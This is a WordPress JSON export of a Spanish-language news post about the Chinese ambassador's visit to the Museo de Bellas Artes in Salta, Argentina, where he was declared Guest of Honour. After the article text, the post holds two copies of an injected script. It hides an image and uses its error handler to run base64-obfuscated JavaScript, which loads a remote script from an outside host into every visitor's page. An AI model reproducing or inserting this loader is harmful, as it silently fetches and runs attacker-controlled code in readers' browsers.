{"id":3592,"date":"2024-01-29T20:05:46","date_gmt":"2024-01-29T23:05:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3592"},"modified":"2025-08-14T00:01:40","modified_gmt":"2025-08-14T03:01:40","slug":"el-embajador-de-la-republica-popular-de-china-en-argentina-visito-el-museo-de-bellas-artes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3592","title":{"rendered":"El Embajador de la Rep\u00fablica Popular de China en Argentina visit\u00f3 el Museo de Bellas Artes"},"content":{"rendered":"\n<p>Junto a funcionarios del Gobierno de la Provincia y la Municipalidad de Salta, la delegaci\u00f3n de la Embajada China en Argentina recorrieron la muestra permanente del museo ubicado en Av. Belgrano 992. Durante la visita, fue declarado Hu\u00e9sped de Honor y recibi\u00f3 la llave de la ciudad por parte del jefe comunal.<\/p>\n\n\n\n<p>En el marco de las celebraciones por el&nbsp;<strong>A\u00f1o Nuevo Chino<\/strong>&nbsp;en Salta, la delegaci\u00f3n de la Embajada de la Rep\u00fablica Popular China en Argentina recorre este fin de semana los espacios representativos de la Cultura en Salta.<\/p>\n\n\n\n<p>La delegaci\u00f3n encabezada por el Sr. WANG Wei, Embajador de la Rep\u00fablica Popular China en Argentina, est\u00e1 conformada por Xue Dongxiao, consejera del Embajador;An Guanghui, Consejero Comercial; Huang Kangyi, Director de la Oficina Cultural de la Embajada; Xie Zhicheng, Int\u00e9rprete, Tercer Secretario; entre otros funcionarios de la embajada.<\/p>\n\n\n\n<p>Durante su recorrido por el Museo de Bellas Artes de la Provincia de Salta, el intendente de la Municipalidad de Salta, Emiliano Durand, declar\u00f3 al diplom\u00e1tico del pa\u00eds asi\u00e1tico, Wang Wei, Hu\u00e9sped de Honor e hizo entrega de la llave de la ciudad.<\/p>\n\n\n\n<p>El recorrido de la delegaci\u00f3n estuvo acompa\u00f1ado por el ministro de Relaciones Internacionales, Julio San Mill\u00e1n; el intendente de la Ciudad de Salta, Emiliano Durand; el secretario de Cultura de la Provincia, Diego Ashur Mas y el director de la Comisi\u00f3n Salta-China, Carlos Saravia Fr\u00edas.<\/p>\n\n\n\n<p>Durante la visita, el diplom\u00e1tico Wang Wei, agradeci\u00f3 la hospitalidad de los presentes y el c\u00e1lido recibimiento a su comitiva.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Junto a funcionarios del Gobierno de la Provincia y la Municipalidad de Salta, la delegaci\u00f3n de la Embajada China en Argentina recorrieron la muestra permanente del museo ubicado en Av. Belgrano 992. Durante la visita, fue declarado Hu\u00e9sped de Honor y recibi\u00f3 la llave de la ciudad por parte del jefe comunal. En el marco [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3593,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-3592","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3592"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3592"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3592\/revisions"}],"predecessor-version":[{"id":6867,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3592\/revisions\/6867"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3593"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}